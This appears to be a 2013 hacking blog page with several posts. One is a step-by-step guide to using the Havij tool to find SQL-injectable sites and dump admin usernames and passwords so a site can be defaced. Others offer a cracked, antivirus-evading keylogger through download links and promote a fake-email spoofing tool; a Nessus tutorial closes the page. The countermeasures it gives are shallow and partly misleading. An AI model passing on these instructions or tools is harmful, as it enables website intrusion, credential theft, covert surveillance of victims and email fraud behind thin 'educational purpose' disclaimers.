Friday, November 29, 2013

Hack Websites Using Havij SQL Injection Tutorial

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.


Supported Databases With Havij
  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)


Demonstration
Now i will Show you step by step the process of SQL injection.
Step1: Find 
SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.
Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection
1.      Renaming the admin page will make it difficult for a hacker to locate it
2.      Use a Intrusion detection system and compose the signatures for popular SQL injection strings
3.      One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Tuesday, October 29, 2013

Our New Blog On Computer Technology & News

Hai Friends,
A Good News  For all My visitors.....


This is Our New Blog On Computer Information & technology about Tips, All About Computer of Windows, Linux,Mac 


Follow Us on : http://techmantra365.blogspot.in/





We are Also Planning To launch Another 3 blogs on

>     Entertainment Portal
>     Education Portal
>     jobs Portal


Keep On Visiting & Happy Surfing To all
Thanks For Your Support
From E-hacking Blog


Friday, October 18, 2013

Actual Spy Keylogger full version with serial key


Actual Spy Keylogger full version with serial key

Actual Spy

What is key logger?

A Key logger (KeyLogger or Keystroke Logger) is a program that runs invisibly in the background, recording all the keystrokes, usually saving the results to a log file.

Keylogger Actual Spy software features:

  • Logs all keystrokes, is case sensitive (keystroke logger).
  • Makes screenshots within the specified time interval.
  • Saves the applications’ running and closing.
  • Watches clipboard contents.
  • Records all print activity.
  • Records disk changes.
  • Records internet connections.
  • Records all websites visited.
  • Records startup/shutdown.
  • All the information is stored in the encrypted log file.
  • Convenient interface of the log and screenshot view.
  • Generates the report in the text and html format.
  • Sends the report to the specified email, via FTP or local area network.
  • Works in the standard and hidden mode.
  • In the hidden mode it is invisible in all operating systems (in Windows NT/2000/XP/Vista/7 processes as well).
  • Provides the opportunity to protect keylogger with the password, so that nobody except you could view the logs.
        Fast installation, convenient and understandable interface, various set of features, flexible           configuration system

Unique Keylogger Actual Spy software features:


  • The keylogger Actual Spy Software is absolutely invisible in the all operating systems (in Windows NT/2000/XP/Vista/7 processes as well) and is not detected by antivirus software.
  • Case sensitive when detecting the keystrokes.
  • When viewing the keystrokes can show only the characters without showing the pressed system keys which is more convenient. For example, if the following keys are pressed:
"[Shift]It[Space]is[Space]keylogger."
  • You can see the text
"It is keylogger."
  • having checked the "Show only characters" option.  
  • Log search with or without the case sensitive option.
  • For your convenience, the limits of the text log size and screenshot size are specified separately, as the screenshots size normally occupies more disk space than a text file.
  • Specifying the limits of the clipboard contents. If large amounts of information are copied to the clipboard, only the specified part will be saved.
  • Sending the reports to email, via FTP or local area network with flexible configuration system.



Use it for Educational Purpose Only, E-hacking4all is not Responsible for all Activites Done by this Tool. Its only to awareness about Keyloggers.

Download link


http://goo.gl/onYQvj


Password For rar file :    http://goo.gl/pvFrAJ



Screen shots:




Saturday, October 12, 2013

Send Fake mails To any One without hacking their mail id's -100% working


Hai friends,

 Today i got a new tool for you  
its a fake mail Tool means You can send prank mails to any one by using any mail id 
you can check it from here my portal 

This is the link You can Use to send fake emails to any email id   

http://goo.gl/bcFb5x

Screen shots:




Mail i got 



if its not loading page just Refresh it 100% working 


Don't Mis use this Tool, It'sOnly For educational Purpose 
x

Monday, September 30, 2013

Nessus On Windows

Nessus On Windows


Nessus is one of the well known and most used vulnerability scanner program. Nessus was built for UNIX platform but now also supports Windows platform. Nessus runs as client server program and available as free and professional version. Download and register your e-mail with them and they will send you information about how to register and use it. Once installation is done you will have two icons one with name Nessus Server another withNessus Client first of all open Nessus Server and add users in it. Then open Nessus Clientand log in, after log in you will see interface as follows,
Please Open Images In New Tab
First of all you will have to define some scan policy to scan target system. For that click on “Policies” then “Add Policy”. Its not difficult to understand how to define general section in policy but if you don't know much about different OS and networking I would better suggest let other options to their defaults.
Next step is to add scan, click on “Scan” and then “Add Scan”, type IP address you want to scan else you can also insert a text file with IP addresses of targets but for now just scan your own computer. Once you press “Launch” button your scan will begin. After scan is complete have your look on vulnerabilities found in target system. 
 
For now don't bother about how to exploit vulnerabilities for hacking purpose that we will cover in “Enumeration” and “Gaining Access/System Hacking” phase. As an honest advice I would recommend you not to limit your self to this tutorial and find more tutorials onwww.YouTube.com . Thanks for reading and keep visiting.